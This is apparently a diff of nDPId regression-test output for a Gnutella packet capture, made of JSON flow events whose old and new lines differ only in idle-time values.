-00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"finished","flow_packets_processed":1251,"flow_first_seen":114930,"flow_last_seen":537520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1051202,"flow_avg_l4_payload_len":840,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66079,"flow_last_seen":75108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.121.165.12","src_port":50219,"dst_port":55376,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":88704,"flow_last_seen":593713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":19428,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"finished","flow_packets_processed":1251,"flow_first_seen":114930,"flow_last_seen":537520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1051202,"flow_avg_l4_payload_len":840,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":493283,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":493283,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":373494,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.68.255","src_port":28681,"dst_port":12838,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":373494,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.68.255","src_port":28681,"dst_port":12838,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.39.233","src_port":28681,"dst_port":20855,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.39.233","src_port":28681,"dst_port":20855,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86640,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86640,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86640,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86640,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490658,"flow_last_seen":490658,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490658,"flow_last_seen":490658,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433135,"flow_last_seen":433135,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.170.209.214","src_port":28681,"dst_port":46210,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433135,"flow_last_seen":433135,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.170.209.214","src_port":28681,"dst_port":46210,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"finished","flow_packets_processed":295,"flow_first_seen":90745,"flow_last_seen":593624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":9996,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90745,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90745,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"finished","flow_packets_processed":295,"flow_first_seen":90745,"flow_last_seen":593624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":9996,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90745,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90745,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82058,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.166.226.70","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 